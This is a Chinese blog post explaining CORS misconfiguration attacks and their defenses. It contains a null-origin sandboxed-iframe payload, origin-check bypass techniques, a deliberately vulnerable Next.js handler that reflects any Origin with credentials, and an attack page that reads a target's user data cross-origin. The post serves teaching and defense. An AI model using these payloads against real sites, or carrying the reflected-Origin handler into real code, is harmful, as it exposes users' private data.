首页 > 其他分享 >简单聊聊 CORS 攻击与防御

简单聊聊 CORS 攻击与防御

时间:2024-09-12 18:17:43浏览次数:10  
标签:Control Origin 标头 target Allow Access 防御 聊聊 CORS

我们是袋鼠云数栈 UED 团队,致力于打造优秀的一站式数据中台产品。我们始终保持工匠精神,探索前端道路,为社区积累并传播经验价值。

本文作者:霁明

什么是CORS

CORS(跨域资源共享)是一种基于HTTP头的机制,可以放宽浏览器的同源策略,实现不同域名网站之间的通信。

前置知识

同源定义:协议、域名、端口号一致即为同源。

CORS主要相关标头:

Access-Control-Allow-Origin:指定该响应的资源是否允许与给定的来源(origin)共享。

Access-Control-Allow-Credentials:用于在请求要求包含 credentials 时,告知浏览器是否可以将对请求的响应暴露给前端 JavaScript 代码。

CORS使用

常规使用方式

将ACAO标头指定为特定的源,Access-Control-Allow-Origin: http://a.b.com

如果请求需要携带凭证(例如cookies、authorization headers 或 TLS client certificates),需要将ACAC标头设置为true,Access-Control-Allow-Credentials: true。

另外,前端请求方法需要配置 credentials

// XHR
const xhr = new XMLHttpRequest();
xhr.open("GET", "http://example.com/");
xhr.withCredentials = true;
xhr.send();

// Fetch
fetch(url, {
  credentials: "include",
});

常见的错误用法

同时配置多个源

将多个源同时写在ACAO标头里:

Access-Control-Allow-Origin: http://a.b.com,http://c.b.com

或者同时设置了多个ACAO标头:

Access-Control-Allow-Origin: http://a.b.com
Access-Control-Allow-Origin: http://c.b.com

此时跨域请求会报错,提示只能配置一个源:

file

在ACAO标头里使用通配符

Access-Control-Allow-Origin: *.b.com

此时跨域请求会报错,提示配置的源无效:

file

ACAO配置为“*”,但请求携带了凭证

Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true

跨域请求时会报错,提示当携带凭证时ACAO标头不能为“*”:

file

用法小结

  • ACAO 标头的值只能为这3种情况之一:*、指定的源(只能指定1个)、null。
  • ACAC 标头设置为 true 时(携带凭证时),ACAO 标头必须设置为一个指定的源。

CORS标头在哪里设置

代理服务器

在 Nginx 配置中,一般会在http、server 或 location 模块中设置响应标头,代码示例:

add_header Access-Control-Allow-Origin http://target.dtstack.cn;
add_header Access-Control-Allow-Credentials true;
// 其他 Access-Control 标头

后端

可以在后端代码中设置,部分后端框架也会设置默认值,以下是部分软件框架默认值设置情况:

file

file

CORS漏洞

在跨域资源共享过程中,由于 CORS 配置不当,导致本应该受限的访问请求,可以绕过访问控制策略读取资源服务器的数据,造成用户隐私泄露,信息窃取甚至账户劫持的危害。

CORS 的几种配置情况:

序号 Access-Control-Allow-Origin Access-Control-Allow-Credentials 结果
1 * true 存在漏洞
2 任意的源 true 存在漏洞
3 指定具体的源> true 不存在漏洞
4 null true 存在漏洞
5 * 不设置 存在漏洞
6 任意的源 不设置 存在漏洞
7 指定具体的源 不设置 不存在漏洞
8 null 不设置 存在漏洞

对于情况1,Access-Control-Allow-Origin: *,Access-Control-Allow-Credentials: true:

  • 如果请求携带了凭证,浏览器会报错,要求ACAO标头不能为*,这种情况下是没有漏洞的,因为请求直接失败了。
  • 如果请求不携带凭证(请求方法未设置 credentials),则相当于情况5,请求能正常响应,如果服务端不要求校验凭证,则数据会被返回。

对于其他存在漏洞情况,都可以通过某些手段,获取到请求返回的数据,这里就不细说。

攻击方式(绕过)

可以攻击的前提:目标网站存在CORS漏洞

使用 null 源

任何使用非分级协议(如 data: 或 file:)的资源和沙盒文件的 Origin 的序列化都被定义为 “null”,这里利用 iframe 标签,使用 data url 格式将 src 的值直接加载为 html,请求代码就写在<script>标签中:

<iframe
  sandbox="allow-scripts allow-top-navigation allow-forms"
  src='data:text/html,<script>fetch("http://target.dtstack.cn:4000/api/getUserInfo", { method: "POST", credentials: "include" })</script>'
  ></iframe>

在 attack.dtstack.cn 页面加载这段代码后就会发出请求:

Host: target.dtstack.cn:4000
Origin: null
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: null

由于 Origin 和 ACAO 标头匹配,所以接口能正常响应获取到数据。

使用符合匹配规则的域名

例如目标域名是 target.top,当 origin 匹配规则为包含 target.top 字符串时,攻击网站可以通过以下几种方式去绕过 origin 校验,使得请求响应的 ACAO 标头为攻击站点,从而成功进行跨域请求。

  • 目标域名作为子域名:target.top.attack.com
  • 攻击域名包含子域名字符串:attacktarget.top
  • 控制目标域名的子域名:attack.target.top

当目标网站是直接使用请求头的 Origin 作为响应的 ACAO 标头时,相当于允许任意站点进行跨域请求。

有时目标网站会信任某些第三方网站,例如一些云服务网站,这时如果攻击者使用同一云服务商的产品(源相同),也可以对目标站点发起跨域请求。

攻击 Demo 演示

在本地使用 Next.js 搭建两个站点,一个是 target.dtstack.cn:4000,一个是 attack.dtstack.cn:3000。

target 站点实现

target 站点有一个查询用户信息接口,并且 CORS 配置存在漏洞,target 站点首页可以通过接口获取用户信息。

file

页面代码图如下:

'use client';
import { useState } from 'react';

const url = '/api/getUserInfo';

export default function Home() {
  const [data, setData] = useState('');

  const getData = () => {
    setData('请求数据...');
    fetch(url, { method: 'POST' })
      .then((res) => res.json())
      .then((data: Record<string, any>) => {
        setData(JSON.stringify(data, null, 2));
      })
      .catch(() => {
        setData('请求数据失败');
      });
  };

  return (
    <div>
      <h3>This is target site</h3>
      <button onClick={getData} style={{ margin: "0 0 12px" }}>
        获取数据
      </button>
      <div>
        <textarea
          readOnly
          value={data}
          style={{ width: 500, height: 500 }}
          />
      </div>
    </div>
  );
}

查询用户信息接口直接将请求的 Origin 设置为 ACAO 标头,且 ACAC 标头设置为 true,代码如下:

export default async function handler(
  req: NextApiRequest,
  res: NextApiResponse
) {
  const cors = Cors({
    origin: req.headers.origin,
    credentials: true,
    methods: ['POST', 'GET', 'HEAD'],
  });

  await runMiddleware(req, res, cors);

  res.setHeader('Set-Cookie', 'user_name=admin; Domain=.target.dtstack.cn; Expires=Fri, 26 Apr 2024 07:13:04 GMT; Path=/;');
  res.json({ username: 'admin' });
}

attack 站点实现

attack 站点可以在页面上,发起对 target 站点查询用户信息接口的请求

file

页面实现代码如下:

'use client';
import { useState } from 'react';

const targetUrl = 'http://target.dtstack.cn:4000/api/getUserInfo';

export default function Home() {
  const [data, setData] = useState('');

  const getData = (url: string) => {
    setData('请求数据...');
    fetch(url, {
      method: 'POST',
      credentials: 'include',
    })
      .then((res) => res.json())
      .then((data: Record<string, any>) => {
        setData(JSON.stringify(data, null, 2));
      })
      .catch(() => {
        setData('请求数据失败');
      });
  };

  return (
    <div>
      <h3>This is attack site</h3>
      <button
        onClick={() => getData(targetUrl)}
        style={{ margin: '0 12px 12px 0' }}
        >
        获取target数据
      </button>
      <div>
        <textarea
          readOnly
          value={data}
          style={{ width: 500, height: 500 }}
          />
      </div>
      <iframe
        sandbox="allow-scripts allow-top-navigation allow-forms"
        src='data:text/html,<script>fetch("http://target.dtstack.cn:4000/api/getUserInfo", { method: "POST", credentials: "include" })</script>'
        ></iframe>
    </div>
  );
}

攻击过程

获取 target 站点数据

打开 attack 页面,请求 target 站点的http://target.dtstack.cn:4000/api/getUserInfo接口

file

请求头:

Host: target.dtstack.cn:4000
Origin: http://attack.dtstack.cn:3000

响应头:

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: http://attack.dtstack.cn:3000

此时成功获取到了target站点的用户数据:

file

如果想要在非同站情况下发送cookie,SameSite属性需要为None,且必须同时设置Secure属性,而Secure属性在使用Https协议时才可以使用。使用目前最新版的Chrome (v124)、Edge (v124)、Firefox (v125)进行测试,Firefox和Chrome不会发送目标站点cookie,而Edge会发送。

file

防御方式(最佳实践)

  • 非必要的话,不要开启 CORS。
  • 定义白名单,对允许的源严格校验,ACAO 标头不要设置为*,origin 也尽量不要使用正则进行校验,避免匹配错误。
  • 使用 https,防止中间人攻击。
  • 配置 Vary 标头包含 Origin,例如 Vary: Origin,请求的 Origin 变化时更新数据,避免攻击者利用缓存。
  • 非必要时不启用 ACAC 标头,防止本地凭证被攻击者利用。
  • 限制允许的请求方法,通过 Access-Control-Allow-Methods 标头设置允许请求的方法,降低风险。
  • 限制缓存时间,通过 Access-Control-Max-Age 标头设置预检请求返回结果的缓存时间,确保浏览器短时间内可以更新缓存。
  • 仅配置需要的响应标头,当接收到跨域请求时才配置相关标头,减少攻击者的恶意利用。

参考链接

最后

欢迎关注【袋鼠云数栈UED团队】~
袋鼠云数栈 UED 团队持续为广大开发者分享技术成果,相继参与开源了欢迎 star

标签:Control,Origin,标头,target,Allow,Access,防御,聊聊,CORS
From: https://www.cnblogs.com/dtux/p/18410759

相关文章

  • 高防IP是如何防御攻击
    DDoS攻击作为网络攻击中最常见的一种,一般利用大量的虚假流量向目标服务器发起攻击,进而堵塞网络损耗服务器性能,使服务器呈现崩溃状态,令真正的用户无法正常访问发送请求。以前的大型企业通常都是使用高防服务器来抵抗这类攻击,但是因为成本太高的缘故很多的中小型企业难以负担。最......
  • 《江湖录》无敌模式攻略:暗器物品不减、伤害防御倍率等
    本教程旨在帮助您充分利用多功能的游戏调整工具,让您在游戏的武侠世界中享受更加自由与丰富的游戏体验。一起来看看具体如何操作。一、准备下载修改器:访问可靠的下载站点,下载《江湖录》风灵月影修改器最新版。解压安装:下载完成后,解压缩安装包到任意位置。江湖录四十九项修......
  • 基于Node.js+vue智能家居攻击与防御方法研究(开题+程序+论文) 计算机毕业设计
    本系统(程序+源码+数据库+调试部署+开发环境)带文档lw万字以上,文末可获取源码系统程序文件列表开题报告内容研究背景随着科技的飞速发展,智能家居已成为现代家庭生活中不可或缺的一部分,通过将各种家庭设备连接到互联网,实现了远程控制、自动化管理和信息共享等功能,极大地提升......
  • 短视频程序源码,文件上传漏洞及防御方法
    短视频程序源码,文件上传漏洞及防御方法一、文件上传漏洞原理在短视频程序源码的文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。二、文件上传漏洞触发点相......
  • 账号信息安全与防御:守护数字世界的门户
    摘要: 在当今数字化时代,账号信息安全成为至关重要的问题。本文深入探讨了账号信息面临的各种威胁,包括黑客攻击、社会工程学、软件漏洞等。详细阐述了账号信息安全的重要性,以及从用户、企业和技术层面应采取的防御措施。通过案例分析强调了忽视账号信息安全的严重后果,并展望了未......
  • 本文深入探讨了账号信息安全的重要性、面临的主要威胁以及防御策略。在数字化时代,账号
    本文深入探讨了账号信息安全的重要性、面临的主要威胁以及防御策略。在数字化时代,账号信息安全对个人隐私与权益、企业稳定与发展至关重要。面临的威胁包括黑客攻击手段不断升级、软件漏洞、内部威胁和社会工程学利用等。防御策略涵盖用户、企业和技术层面,如用户增强安全意识、......
  • 十六年所思所感,聊聊这些年我所经历的 DevOps 系统
    作者:子丑前不久,我因为运动时的姿势不对,导致右腿骨折,喜提三个月的居家修养。按照作家刘震云的说法,这叫做着正确的事情,却迈着不正确的步伐。于是乎,我的活动空间骤减,每日除了短暂地楼下放风,便是卧坐于方寸之间。周遭静下来,许多回忆便涌了上来。从2008年开始,我陆陆续续参与了多个Dev......
  • 十六年所思所感,聊聊这些年我所经历的 DevOps 系统
    作者:子丑前不久,我因为运动时的姿势不对,导致右腿骨折,喜提三个月的居家修养。按照作家刘震云的说法,这叫做着正确的事情,却迈着不正确的步伐。于是乎,我的活动空间骤减,每日除了短暂地楼下放风,便是卧坐于方寸之间。周遭静下来,许多回忆便涌了上来。从2008年开始,我陆陆续续参与了多个Dev......
  • 十六年所思所感,聊聊这些年我所经历的 DevOps 系统
    作者:子丑前不久,我因为运动时的姿势不对,导致右腿骨折,喜提三个月的居家修养。按照作家刘震云的说法,这叫做着正确的事情,却迈着不正确的步伐。于是乎,我的活动空间骤减,每日除了短暂地楼下放风,便是卧坐于方寸之间。周遭静下来,许多回忆便涌了上来。从2008年开始,我陆陆续续参与了多个......
  • 十六年所思所感,聊聊这些年我所经历的 DevOps 系统
    作者:子丑前不久,我因为运动时的姿势不对,导致右腿骨折,喜提三个月的居家修养。按照作家刘震云的说法,这叫做着正确的事情,却迈着不正确的步伐。于是乎,我的活动空间骤减,每日除了短暂地楼下放风,便是卧坐于方寸之间。周遭静下来,许多回忆便涌了上来。从2008年开始,我陆陆续续参与了多个......